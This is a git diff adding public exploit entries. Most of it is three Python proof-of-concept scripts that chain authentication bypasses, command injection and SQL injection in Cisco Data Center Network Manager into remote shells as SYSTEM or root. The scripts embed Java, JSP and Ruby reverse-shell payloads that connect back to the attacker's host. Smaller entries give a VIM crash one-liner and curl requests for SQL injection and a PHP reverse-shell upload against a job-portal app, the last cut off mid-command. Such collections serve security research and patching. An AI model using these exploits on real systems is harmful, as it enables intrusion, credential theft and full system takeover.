diff --git a/exploits/java/webapps/48018.py b/exploits/java/webapps/48018.py new file mode 100755 index 000000000..6da6093f6 --- /dev/null +++ b/exploits/java/webapps/48018.py @@ -0,0 +1,265 @@ +#!/usr/bin/python +""" +Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability + +Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit) +- Release: 11.2(1) +- Release Date: 18-Jun-2019 +- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip +- Size: 1619.36 MB (1698022100 bytes) +- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 + +Bug 1: CVE-2019-15975 / ZDI-20-003 +Bug 2: CVE-2019-15979 / ZDI-20-100 + +Notes: +====== + +Si.java needs to be compiled against Java 8 (the target used 1.8u201): + +import java.io.IOException; +import java.io.InputStream; +import java.io.OutputStream; +import java.net.Socket; + +public class Si { + static{ + try { + String host = "192.168.100.159"; + int port = 1337; + String cmd = "cmd.exe"; + Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start(); + Socket s = new Socket(host,port); + InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream(); + OutputStream po = p.getOutputStream(), so = s.getOutputStream(); + while(!s.isClosed()){ + while(pi.available()>0){ + so.write(pi.read()); + } + while(pe.available()>0){ + so.write(pe.read()); + } + while(si.available()>0){ + po.write(si.read()); + } + so.flush(); + po.flush(); + Thread.sleep(50); + try { + p.exitValue(); + break; + }catch (Exception e){} + } + p.destroy(); + s.close(); + }catch (IOException | InterruptedException e){ } + } +} + +Example: +======== + +1. Modify the above Si.java to contain your connectback ip and port +2. Compile the above Si.java class with Java 8 and store it in an attacker controlled share +3. Launch the poc.py against your target using the share + +saturn:~ mr_me$ ./poc.py +(+) usage: ./poc.py +(+) eg: ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools' + +saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.159:1337 vmware-host '\Shared Folders\tools' +(+) attempting auth bypass 1 +(+) bypassed auth! added a global admin hacker:Hacked123 +(+) attempting to load class from \\vmware-host\Shared Folders\tools\Si.class +(+) starting handler on port 1337 +(+) connection from 192.168.100.122 +(+) pop thy shell! +Microsoft Windows [Version 6.3.9600] +(c) 2013 Microsoft Corporation. All rights reserved. + +C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami +whoami +nt authority\system + +C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service> +""" + +import re +import os +import sys +import time +import base64 +import socket +import requests +import calendar +import telnetlib +from uuid import uuid4 +from threading import Thread +from Crypto.Cipher import AES +from xml.etree import ElementTree +from datetime import datetime, timedelta +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +class AESCipher: + def __init__(self): + + # Cisco's hardcoded key + self.key = "s91zEQmb305F!90a" + self.bs = 16 + + def _pad(self, s): + return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs) + + def encrypt(self, raw): + raw = self._pad(raw) + iv = "\x00" * 0x10 + cipher = AES.new(self.key, AES.MODE_CBC, iv) + return base64.b64encode(cipher.encrypt(raw)) + +def make_raw_token(target): + """ craft our token """ + key = "Source Incite" + uuid = str(uuid4()).replace("-","")[0:20] + time = leak_time(target) + return "%s-%s-%s" % (key, uuid, time) + +def bypass_auth(target, token, usr, pwd): + """ we use this primitive to fully bypass auth """ + global user_added_already + d = { + "userName" : usr, + "password" : pwd, + "roleName" : "global-admin" + } + h = { "afw-token" : token } + uri = "https://%s/fm/fmrest/dbadmin/addUser" % target + r = requests.post(uri, data=d, headers=h, verify=False) + try: + json = r.json() + except ValueError: + return False + if json["resultMessage"] == "Success": + user_added_already = False + return True + elif json["resultMessage"] == "User already exists.": + user_added_already = True + return True + return False + +def leak_time(target): + """ leak the time from the server (not really needed) """ + uri = "https://%s/" % target + r = requests.get(uri, verify=False) + r_time = datetime.strptime(r.headers['Date'][:-4], '%a, %d %b %Y %H:%M:%S') + return calendar.timegm(r_time.timetuple()) + +def gen_token(target, usr, pwd): + """ this authenticates via the SOAP endpoint """ + soap_body = '' + soap_body += '\t' + soap_body += '\t' + soap_body += '\t\t' + soap_body += '\t\t\t%s' % usr + soap_body += '\t\t\t%s' % pwd + soap_body += '\t\t\t100000' + soap_body += '\t\t' + soap_body += '\t' + soap_body += '' + uri = "https://%s/LogonWSService/LogonWS" % target + r = requests.post(uri, data=soap_body, verify=False) + tree = ElementTree.fromstring(r.content) + for elem in tree.iter(): + if elem.tag == "return": + return elem.text + return False + +def craft_soap_header(target, usr, pwd): + """ this generates the soap header """ + soap_header = '\t' + soap_header += '%s' % gen_token(target, usr, pwd) + soap_header += '\t' + return soap_header + +def load_remote_class(target, smb, usr, pwd): + """ this triggers the cmdi """ + soap_body = '' + soap_body += craft_soap_header(target, usr, pwd) + soap_body += '\t' + soap_body += '\t\t' + soap_body += '\t\t\t" -providerclass Si -providerpath "%s' % smb + soap_body += '\t\t\t' + soap_body += '\t\t' + soap_body += '\t' + soap_body += '' + uri = "https://%s/SanWSService/SanWS" % target + r = requests.post(uri, data=soap_body, verify=False) + tree = ElementTree.fromstring(r.content) + for elem in tree.iter(): + if elem.tag == "resultMessage": + if elem.text == "Success": + return True + return False + +def handler(lp): + print "(+) starting handler on port %d" % lp + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", lp)) + s.listen(1) + conn, addr = s.accept() + print "(+) connection from %s" % addr[0] + t.sock = conn + print "(+) pop thy shell!" + t.interact() + +def exec_code(t, lp, s, usr, pwd): + handlerthr = Thread(target=handler, args=(lp,)) + handlerthr.start() + load_remote_class(t, s, usr, pwd) + +def main(): + usr = "hacker" + pwd = "Hacked123" + if len(sys.argv) != 5: + print "(+) usage: %s " % sys.argv[0] + print "(+) eg: %s 192.168.100.122 192.168.100.159:1337 vmware-host '\\Shared Folders\\tools'" % sys.argv[0] + sys.exit(1) + t = sys.argv[1] + c = sys.argv[2] + s = "\\\\%s%s" % (sys.argv[3], sys.argv[4]) + i = 0 + + if not ":" in c: + print "(+) using default connectback port 4444" + ls = c + lp = 4444 + else: + if not c.split(":")[1].isdigit(): + print "(-) %s is not a port number!" % cb.split(":")[1] + sys.exit(-1) + ls = c.split(":")[0] + lp = int(c.split(":")[1]) + + # InheritableThreadLocal.childValue performs a 'shallow copy' and causes a small race condition + while 1: + i += 1 + print "(+) attempting auth bypass %d" % i + raw = make_raw_token(t) + cryptor = AESCipher() + token = cryptor.encrypt(raw) + if bypass_auth(t, token, usr, pwd): + if not user_added_already: + print "(+) bypassed auth! added a global admin %s:%s" % (usr, pwd) + else: + print "(+) we probably already bypassed auth! try the account %s:%s" % (usr, pwd) + break + sys.stdout.write('\x1b[1A') + sys.stdout.write('\x1b[2K') + + # we have bypassed the authentication at this point + print "(+) attempting to load class from %s\\Si.class" % s + exec_code(t, lp, s, usr, pwd) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/java/webapps/48019.py b/exploits/java/webapps/48019.py new file mode 100755 index 000000000..f689c0a1a --- /dev/null +++ b/exploits/java/webapps/48019.py @@ -0,0 +1,323 @@ +#!/usr/bin/python +""" +Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability + +Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit) +- Release: 11.2(1) +- Release Date: 18-Jun-2019 +- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip +- Size: 1619.36 MB (1698022100 bytes) +- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 + +Bug 1: CVE-2019-15976 / ZDI-20-008 +Bug 2: CVE-2019-15984 / ZDI-20-060 + +Example: +======== + +saturn:~ mr_me$ ./poc.py +(+) usage: ./poc.py +(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337 + +saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337 +(+) created the account hacker:Hacked123 +(+) created the 1337/custom path! +(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c +(+) SQL Injection working! +(+) wrote the si.jsp shell! +(+) cleaned up the database! +(+) starting handler on port 1337 +(+) connection from 192.168.100.122 +(+) pop thy shell! +Microsoft Windows [Version 6.3.9600] +(c) 2013 Microsoft Corporation. All rights reserved. + +C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami +whoami +nt authority\system + +C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service> + +Clean Up: +========= + +1. delete from xmlDocs where user_name = '1337'; +2. delete si.jsp from the web root +3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337 +""" + +import re +import md5 +import sys +import time +import socket +import base64 +import requests +import telnetlib +from threading import Thread +from xml.etree import ElementTree +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +def _get_jsp(cbh, cbp): + """ get me some jsp for a connectback! """ + jsp = """ + <%%@page import="java.lang.*"%%> + <%%@page import="java.util.*"%%> + <%%@page import="java.io.*"%%> + <%%@page import="java.net.*"%%> + + <%% + // clean up + String[] files = { + "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml", + "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/", + "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/", + }; + for (String s:files){ File f = new File(s); f.delete(); } + File f = new File(application.getRealPath("/" + this.getClass().getSimpleName().replaceFirst("_","."))); + f.delete(); + class StreamConnector extends Thread + { + InputStream we; + OutputStream uo; + + StreamConnector( InputStream we, OutputStream uo ) + { + this.we = we; + this.uo = uo; + } + + public void run() + { + BufferedReader dy = null; + BufferedWriter zvi = null; + try + { + dy = new BufferedReader( new InputStreamReader( this.we ) ); + zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) ); + char buffer[] = new char[8192]; + int length; + while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 ) + { + zvi.write( buffer, 0, length ); + zvi.flush(); + } + } catch( Exception e ){} + try + { + if( dy != null ) + dy.close(); + if( zvi != null ) + zvi.close(); + } catch( Exception e ){} + } + } + + try + { + String ShellPath; + ShellPath = new String("cmd.exe"); + Socket socket = new Socket( "%s", %s); + Process process = Runtime.getRuntime().exec( ShellPath ); + ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); + ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); + } catch( Exception e ) {} + %%> + """ % (cbh, cbp) + return jsp + +def get_session(target, user, password): + """ we have bypassed auth at this point and created an admin """ + d = { + "j_username" : user, + "j_password" : password + } + uri = "https://%s/j_spring_security_check" % target + r = requests.post(uri, data=d, verify=False, allow_redirects=False) + if "Set-Cookie" in r.headers: + match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,4}:.{44});", r.headers["Set-Cookie"]) + if match: + sessionid = match.group(1) + resttoken = match.group(2) + return { "JSESSIONID" : sessionid, "resttoken": resttoken} + return False + +def craft_soap_header(): + soap_header = '\t' + soap_header += '%s' % gen_ssotoken() + soap_header += '\t' + return soap_header + +def we_can_trigger_folder_path_creation(target): + """ craft the path location and db entry for the traversal """ + soap_body = '' + soap_body += craft_soap_header() + soap_body += '\t' + soap_body += '\t\t' + soap_body += '\t\t\tsi' + soap_body += '\t\t\t1337' + soap_body += '\t\t\t' + soap_body += '\t\t\t1337' + soap_body += '\t\t' + soap_body += '\t' + soap_body += '' + uri = "https://%s/ReportWSService/ReportWS" % target + r = requests.post(uri, data=soap_body, verify=False) + if r.status_code == 200: + return True + return False + +def we_can_trigger_second_order_write(target, shellpath): + """ trigger the traversal """ + soap_body = '' + soap_body += craft_soap_header() + soap_body += '\t' + soap_body += '\t\t' + soap_body += '\t\t\t%s' % shellpath + soap_body += '\t\t\t1337' + soap_body += '\t\t' + soap_body += '\t' + soap_body += '' + uri = "https://%s/ReportWSService/ReportWS" % target + r = requests.post(uri, data=soap_body, verify=False) + if r.status_code == 200: + return True + return False + +def gen_ssotoken(): + """ auth bypass """ + timestamp = 9999999999999 # we live forever + username = "hax" # doesnt even need to exist! + sessionid = 1337 # doesnt even need to exist! + d = "%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" % (username, sessionid, timestamp) + return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username) + +def we_can_trigger_sql_injection(target, sql): + """ stacked sqli primitive """ + sqli = ";%s--" % sql + soap_body = '' + soap_body += craft_soap_header() + soap_body += '\t' + soap_body += '\t\t' + soap_body += '\t\t\t' + soap_body += '\t\t\t\tvcluster' + soap_body += '\t\t\t\t%s' % sqli + soap_body += '\t\t\t' + soap_body += '\t\t\t' + soap_body += '\t\t\t' + soap_body += '\t\t\tfalse' + soap_body += '\t\t' + soap_body += '\t' + soap_body += '' + uri = "https://%s/DbInventoryWSService/DbInventoryWS" % target + r = requests.post(uri, data=soap_body, verify=False) + if r.status_code == 200: + return True + return False + +def we_can_leak_vfs(target): + """ we use a information disclosure for the vfs path """ + global vfs + uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target + c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345') + r = requests.get(uri, verify=False, auth=c) + match = re.search(r"temp\\(.{21}content-.{15,16})", r.text) + if match: + vfs = str(match.group(1).replace("\\","/")) + return True + return False + +def handler(lp): + """ this is the client handler, to catch the connectback """ + print "(+) starting handler on port %d" % lp + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", lp)) + s.listen(1) + conn, addr = s.accept() + print "(+) connection from %s" % addr[0] + t.sock = conn + print "(+) pop thy shell!" + t.interact() + +def exec_code(t, usr, pwd, cbp): + """ this function threads the client handler and sends off the attacking payload """ + handlerthr = Thread(target=handler, args=(int(cbp),)) + handlerthr.start() + r = requests.get("https://%s/si.jsp" % t, cookies=get_session(t, usr, pwd), verify=False) + +def we_can_add_user(target, usr, pwd): + """ add a user so that we can reach our backdoor! """ + soap_body = '' + soap_body += craft_soap_header() + soap_body += '\t' + soap_body += '\t\t' + soap_body += '\t\t\t%s' % usr + soap_body += '\t\t\t%s' % pwd + soap_body += '\t\t\tglobal-admin' + soap_body += '\t\t\tfalse' + soap_body += '\t\t' + soap_body += '\t' + soap_body += '' + uri = "https://%s/DbAdminWSService/DbAdminWS" % target + r = requests.post(uri, data=soap_body, verify=False) + tree = ElementTree.fromstring(r.content) + for elem in tree.iter(): + if elem.tag == "resultMessage": + res = elem.text + if res == "Success": + return True + elif res == "User already exists.": + return True + return False + +def main(): + + usr = "hacker" + pwd = "Hacked123" + + if len(sys.argv) != 3: + print "(+) usage: %s " % sys.argv[0] + print "(+) eg: %s 192.168.100.122 192.168.100.59:1337" % sys.argv[0] + sys.exit(1) + + t = sys.argv[1] + c = sys.argv[2] + + cbh = c.split(":")[0] + cbp = c.split(":")[1] + sc = _get_jsp(cbh, cbp).encode("hex") + + # stage 1 - add a user + if we_can_add_user(t, usr, pwd): + print "(+) created the account %s:%s" % (usr, pwd) + + # stage 2 - trigger folder creation and db entry + if we_can_trigger_folder_path_creation(t): + print "(+) created the 1337/custom path!" + + # stage 3 - leak the vfs path (not really required I suppose) + if we_can_leak_vfs(t): + print "(+) leaked vfs! %s" % vfs + + # stage 4 - trigger the sql injection to update our template entry + sp = "../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp" % vfs + sql = "update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';" % (sp, sc) + if we_can_trigger_sql_injection(t, sql): + print "(+) SQL Injection working!" + + # stage 5 - trigger the shell write + if we_can_trigger_second_order_write(t, sp): + print "(+) wrote the si.jsp shell!" + + # stage 6 - cleanup + sql = "delete from xmldocs where user_name='1337';" + if we_can_trigger_sql_injection(t, sql): + print "(+) cleaned up the database!" + + # stage 7 - go get some rce + exec_code(t, usr, pwd, cbp) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/java/webapps/48020.py b/exploits/java/webapps/48020.py new file mode 100755 index 000000000..d4e09caa9 --- /dev/null +++ b/exploits/java/webapps/48020.py @@ -0,0 +1,201 @@ +#!/usr/bin/python +""" +Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability + +Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers +- Release: 11.2(1) +- Release Date: 05-Jun-2019 +- FileName: dcnm-va.11.2.1.iso.zip +- Size: 4473.54 MB (4690850167 bytes) +- MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb + +Bug 1: CVE-2019-15977 / ZDI-20-012 +Bug 2: CVE-2019-15977 / ZDI-20-013 +Bug 3: CVE-2019-15978 / ZDI-20-102 + +Example: +======== + +saturn:~ mr_me$ ./poc.py +(+) usage: ./poc.py +(+) eg: ./poc.py 192.168.100.123 192.168.100.59 +(+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337 + +saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.59:1337 +(+) leaked user: root +(+) leaked pass: Dcnmpass123 +(+) leaked vfs path: temp18206a94b7c45072/content-85ba056e1faec012 +(+) created a root session! +(+) starting handler on port 1337 +(+) connection from 192.168.100.123 +(+) pop thy shell! +id +uid=0(root) gid=0(root) groups=0(root) +uname -a +Linux localhost 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux +""" + +import re +import sys +import random +import socket +import string +import requests +import telnetlib +from threading import Thread +from Crypto.Cipher import Blowfish +from requests.auth import HTTPBasicAuth +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +def handler(lp): + print "(+) starting handler on port %d" % lp + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", lp)) + s.listen(1) + conn, addr = s.accept() + print "(+) connection from %s" % addr[0] + t.sock = conn + print "(+) pop thy shell!" + t.interact() + +def exec_code(t, lp, s): + handlerthr = Thread(target=handler, args=(lp,)) + handlerthr.start() + c = { "JSESSIONID" : sessionid } + r = requests.get("https://%s/%s" % (t, s), cookies=c, verify=False) + +def random_string(string_length = 8): + """ generate a random string of fixed length """ + letters = string.ascii_lowercase + return ''.join(random.choice(letters) for i in range(string_length)) + +def decrypt(key): + """ decrypt the leaked password """ + cipher = Blowfish.new("jaas is the way", Blowfish.MODE_ECB) + msg = cipher.decrypt(key.decode("hex")) + return msg + +def we_can_leak(target): + """ used to bypass auth """ + global dbuser, dbpass, vfspth, jdbc, rootuser, rootpass + dbuser = None + dbpass = None + vfspth = None + rootuser = None + rootpass = None + jdbc = None + uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target + c = HTTPBasicAuth('admin', 'nbv_12345') + r = requests.get(uri, verify=False, auth=c) + leaked = r.text + match = re.search("db.password = #(.*)", leaked) + if match: + dbpass = match.group(1) + match = re.search("db.user = (.*)", leaked) + if match: + dbuser = match.group(1) + match = re.search("dcnmweb = (.*)", leaked) + if match: + vfspth = match.group(1) + match = re.search("db.url = (.*)", leaked) + if match: + jdbc = match.group(1) + match = re.search("server.sftp.password = #(.*)", leaked) + if match: + rootpass = match.group(1) + match = re.search("server.sftp.username = (.*)", leaked) + if match: + rootuser = match.group(1) + if dbuser and dbpass and vfspth and jdbc and rootuser and rootpass: + return True + return False + +def we_can_login(target, password): + """ we have bypassed auth at this point by leaking the creds """ + global sessionid, resttoken + d = { + "j_username" : rootuser, + "j_password" : password, + } + uri = "https://%s/j_spring_security_check" % target + r = requests.post(uri, data=d, verify=False, allow_redirects=False) + if "Set-Cookie" in r.headers: + match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,3}:.{44});", r.headers["Set-Cookie"]) + if match: + sessionid = match.group(1) + resttoken = match.group(2) + return True + return False + +def pop_a_root_shell(t, ls, lp): + """ get dat shell! """ + handlerthr = Thread(target=handler, args=(lp,)) + handlerthr.start() + uri = "https://%s/rest/fabrics" % t + cmdi = "%s\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"%s\",\"%d\");" % (random_string(), ls, lp) + cmdi += "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\"" + j = { + "name" : cmdi, + + # this is needed to pass validate() on line 149 of the LanFabricImpl class + "generalSetting" : { + "asn" : "1337", + "provisionOption" : "Manual" + }, + "provisionSetting" : { + "dhcpSetting": { + "primarySubnet" : "127.0.0.1", + "primaryDNS" : "127.0.0.1", + "secondaryDNS" : "127.0.0.1" + }, + "ldapSetting" : { + "server" : "127.0.0.1" + }, + "amqpSetting" : { + "server" : "127.0.0.1:1337" + } + } + } + c = { "resttoken": resttoken } + r = requests.post(uri, json=j, cookies=c, verify=False) + if r.status_code == 200 and ls in r.text: + return True + return False + +def main(): + if len(sys.argv) != 3: + print "(+) usage: %s " % sys.argv[0] + print "(+) eg: %s 192.168.100.123 192.168.100.59" % sys.argv[0] + print "(+) eg: %s 192.168.100.123 192.168.100.59:1337" % sys.argv[0] + sys.exit(1) + t = sys.argv[1] + cb = sys.argv[2] + if not ":" in cb: + print "(+) using default connectback port 4444" + ls = cb + lp = 4444 + else: + if not cb.split(":")[1].isdigit(): + print "(-) %s is not a port number!" % cb.split(":")[1] + sys.exit(-1) + ls = cb.split(":")[0] + lp = int(cb.split(":")[1]) + + # stage 1 - leak the creds + if we_can_leak(t): + pwd = re.sub(r'[^\x20-\x7F]+','', decrypt(rootpass)) + print "(+) leaked user: %s" % rootuser + print "(+) leaked pass: %s" % pwd + print "(+) leaked vfs path: %s" % "/".join(vfspth.split("/")[10:]) + + # stage 2 - get a valid sesson + if we_can_login(t, pwd): + print "(+) created a root session!" + + # stage 3 - get a root shell via cmdi + pop_a_root_shell(t, ls, lp) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/linux/dos/48008.txt b/exploits/linux/dos/48008.txt new file mode 100644 index 000000000..fc1a68748 --- /dev/null +++ b/exploits/linux/dos/48008.txt @@ -0,0 +1,11 @@ +# Exploit Title: VIM 8.2 - Denial of Service (PoC) +# Date: 2019-12-17 +# Vulnerability: DoS +# Vulnerability Discovery: Dhiraj Mishra +# Vulnerable Version: VIM - Vi IMproved 8.2 (Included patches: 1-131) +# Vendor Homepage: https://www.vim.org/ +# References: +# https://github.com/vim/vim/commit/98a336dd497d3422e7efeef9f24cc9e25aeb8a49 +# Invalid memory access with search command + +PoC: vim --clean -e -s -c 'exe "norm /\x80PS"' \ No newline at end of file diff --git a/exploits/php/webapps/48007.txt b/exploits/php/webapps/48007.txt new file mode 100644 index 000000000..a479a4bdd --- /dev/null +++ b/exploits/php/webapps/48007.txt @@ -0,0 +1,56 @@ +# Exploit Title: Online Job Portal 1.0 - 'user_email' SQL Injection +# Dork: N/A +# Date: 2020-02-06 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip +# Version: 1.0 +# Tested on: Linux +# CVE: N/A + +# POC: +# 1) +# +curl -i -s -k -X $'POST' \ + -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 282' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \ + --data-binary $'user_email=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20VerAyari&user_pass=0x5665724179617269&btnLogin=0x5665724179617269' \ + $'http://localhost/[PATH]/admin/login.php' +# +HTTP/1.1 200 OK +Date: Wed, 05 Feb 2020 19:18:45 GMT +Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 +X-Powered-By: PHP/5.6.40 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 3251 +Connection: close +Content-Type: text/html; charset=UTF-8 +............. + +Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key' +# + +# POC: +# 2) +# +curl -i -s -k -X $'POST' \ + -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 237' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \ + --data-binary $'USERNAME=1\'%20aND%20(SeLeCT%201%20FRoM(SeLeCT%20CoUNT(*),CoNCaT((SeLeCT%20(eLT(2=2,1))),CoNCaT_WS(0x203a20,USeR(),DaTaBaSe(),veRSIoN()),FLooR(RaND(0)*2))x%20FRoM%20INFoRMaTIoN_SCHeMa.PLUGINS%20GRoUP%20BY%20x)a)--%20verayari&PASS=VerAyari' \ + $'http://localhost/[PATH]/process.php?action=login' +# +HTTP/1.1 200 OK +Date: Wed, 05 Feb 2020 19:17:19 GMT +Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 +X-Powered-By: PHP/5.6.40 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 167 +Connection: close +Content-Type: text/html; charset=UTF-8 + +Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key' +# \ No newline at end of file diff --git a/exploits/php/webapps/48012.txt b/exploits/php/webapps/48012.txt new file mode 100644 index 000000000..893fe8b69 --- /dev/null +++ b/exploits/php/webapps/48012.txt @@ -0,0 +1,33 @@ +# Exploit Title: Online Job Portal 1.0 - Remote Code Execution +# Dork: N/A +# Date: 2020-02-06 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip +# Version: 1.0 +# Tested on: Linux +# CVE: N/A + +# POC: +# 1) +# +curl -i -s -k -X $'POST' \ + -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------1852293616672951051689730436' -H $'Content-Length: 781' -H $'Referer: http://localhost/[PATH]/admin/user/index.php?view=view' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \ + --data-binary $'-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"mealid\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a1000000\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"photo\"; filename=\"exp.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0aGIF89c;\x0d\x0a $sock,\x0d\x0a1 => $sock,\x0d\x0a2 => $sock\x0d\x0a);\x0d\x0a\x0d\x0a$process = proc_open(\'/bin/sh\', $descriptorspec, $pipes);\x0d\x0aproc_close($process);?>\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"savephoto\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436--\x0d\x0a' \ + $'http://localhost/[PATH]/admin/user/controller.php?action=photos' +# +curl -i -s -k -X $'GET' \ + -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: 